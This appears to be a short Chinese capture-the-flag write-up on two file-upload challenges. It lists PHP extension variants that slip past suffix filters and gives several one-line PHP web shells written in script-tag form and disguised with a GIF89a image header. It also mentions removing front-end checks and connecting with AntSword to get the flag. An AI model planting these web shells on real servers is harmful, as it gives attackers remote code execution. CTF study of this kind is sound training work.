[极客大挑战 2019]Upload
上传要求图片格式,文件中不能有<?
绕过后缀的有文件格式有php,php3,php4,php5,phtml,pht
当过滤了<?时的一句话木马
<script language='php‘>@eval($_POST['连接蚁剑的密码']);</script>
这是GIF89a图片头文件欺骗的一句话木马:
GIF89a? <script language="php">eval($_REQUEST[连接蚁剑的密码])</script>
这里用文件后缀为phtml的,文件内容为:
GIF89a? <script language="php">eval($_REQUEST['shell'])</script>
上传成功后连接
[ACTF2020 新生赛]Upload
前端删除检查文件类型的代码绕过:
后端用phtml文件后缀加GIF89a绕过
然后连接shell找到flag。